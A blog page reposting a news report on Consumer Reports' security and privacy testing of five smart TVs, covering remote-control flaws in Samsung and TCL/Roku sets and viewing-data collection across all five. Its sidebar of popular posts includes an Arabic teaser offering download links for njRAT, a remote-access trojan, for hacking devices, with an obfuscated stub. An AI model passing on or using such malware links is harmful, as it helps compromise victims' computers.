Five smart TVs tested for security, privacy issues



As more and more smart TVs are sold worldwide, consumers should be aware of the risks associated with this technology.
Consumer Union, a US-based nonprofit organization dedicated to unbiased product testing, has conducted a privacy and security evaluation of five smart TVs from the most widely sold TV brands in the US:
  • Samsung UN49MU8000, running the company’s Tizen OS
  • LG 49UJ7700, which uses LG’s webOS
  • TCL 55P605, which uses the Roku streaming platform
  • Sony XBR-49X800E, running Google’s Android TV OS
  • Vizio P55-E1 SmartCast TV, which uses Google’s Chromecast platform.

Security issues

The testers found that remote attackers can take control of the Samsung and TCL TVs by exploiting flaws in the setups, allowing them to change channels, change volume levels, open disturbing content, and so on.
Samsung smart TVs attempt to ensure that only authorized applications can control the television, but the mechanism they use to ensure that applications have previously been authorized is flawed and exploitable, researchers with Disconnect, a maker of privacy-enhancing software for consumers and Consumer Reports partner, discovered.
TCL’s problem stems from the fact that the Roku platform has an unsecured remote control API enabled by default.
“To become a victim of a real-world attack, a TV user would need to be using a phone or laptop running on the same WiFi network as the television, and then visit a site or download a mobile app with malicious code. That could happen, for instance, if they were tricked into clicking on a link in a phishing email or if they visited a site containing an advertisement with the code embedded,” Consumer Reports noted.


Privacy issues

When it comes to user privacy, all of the tested TVs have been found wanting.
“Every smart TV we evaluated asked for permission to collect viewing data and other kinds of information,” the testers noted.
“But we found that it’s not always easy to understand what you’re agreeing to as you proceed through the setup process. And if you decline permissions, you can lose a surprising amount of functionality.”
In general, consumers will either permit the collection of viewing data and it being shared with third-parties or won’t get recommendations. Also, if they say no to a basic privacy policy, they won’t be able to stream anything web-based services such as Netflix or Amazon. In fact, with Sony XBR-49X800E, consumers must agree to a privacy policy and terms of service just to be able to complete the setup of the TV!
Vendors say that consumers can prevent any data sharing by not connecting the smart TV to the Internet but, again, that makes it impossible to stream content from it. Essentially, you get a “dumb” TV.
“If you do buy a new smart TV, decide whether you want to block the collection of viewing data. If so, pay close attention during setup. There, you can agree to the basic privacy policy and terms of service—which still triggers a significant amount of data collection—while declining ACR [automatic content recognition],” the publication advises.
For those who have already set up the TV but would now like to restrict the collection of data, resetting the TV to factory settings is a good first step, followed by a careful setup process and tweaking of deeply buried settings.

Comments

Post a Comment

Popular posts from this blog

تحميل اصدارات برنامج njRAT لاختراق الاجهزة 2017

Image
تحميل   اصدارات برنامج  njRAT  لاختراق الاجهزة  2017 ---------------------------------------------------------------------------------------------- السلام عليكم ورحمة الله تعالى وبركاته تحميل جميع اصدارات برنامج  njRAT  الشهير لاختراق الاجهزة مع تشفيرة متواضعة  لستب njRAT 5 نتيجة فحص تشفيرة الستب http://pscan.xyz/results.php?id=VbGXRoAJjWiEeSHH الان ناتي الى التحميل njRAT_v0.3.5 للتحميل https://up.top4top.net/downloadf-483nr2oz4-rar.html njRAT_v0.4.1 https://up.top4top.net/downloadf-483nhv6j2-rar.html njRAT_v0.5.0 للتحميل https://up.top4top.net/downloadf-483nihol1-rar.html njRAT-v0.6.4 للتحميل https://up.top4top.net/downloadf-483dr2zk1-rar.html njRAT-v0.7d
Read more

Cybersecurity in 2018: Three predictions and one hope

Image
Effective cybersecurity means keeping a close eye on the threats you currently face, and an even closer eye on the threats to come. As you consider your security strategy and investments for the coming year, here are three key trends that will define the threat landscape in 2018, and one hope for a more effective approach to protection.  Risk will continue to shift from infrastructure to the application layer As web apps have evolved from basic information and ecommerce functionality to full-fledged online services, their code and customer data have made them an increasingly appealing target for hackers. Not only are they accessible via the open Internet—they’re also woefully underprotected, with the application layer drawing only 3 percent of the typical security budget at a time when it accounts for 30 percent of successful breaches, according to Verizon. While an incident of the magnitude of the Equifax breach can hardly be said to have a silver lining...
Read more

Which phishing messages have a near 100% click rate?

Image
Training employees to spot phishing emails, messages and phone calls can’t be done just once or once a year if the organization wants to see click rates decrease. For one thing, employees come and go (and change roles) with regularity. Secondly, threats change over time. Thirdly, knowledge and practices that aren’t regularly reinforced will be lost. And, finally, awareness isn’t the same as knowledge. “Just knowing a threat exists isn’t the same as knowing how to recognize and respond to a threat when it presents itself. In-depth education about phishing prevention is needed to create lasting behavior change,” Wombat Security researchers point out. The statistics included in the company’s latest annual State of the Phish report show the difference made by both the tools used to train end users to recognize and avoid phishing attacks and how often they are used. In the US, most organizations use computer-based online security awareness training and simulated ...
Read more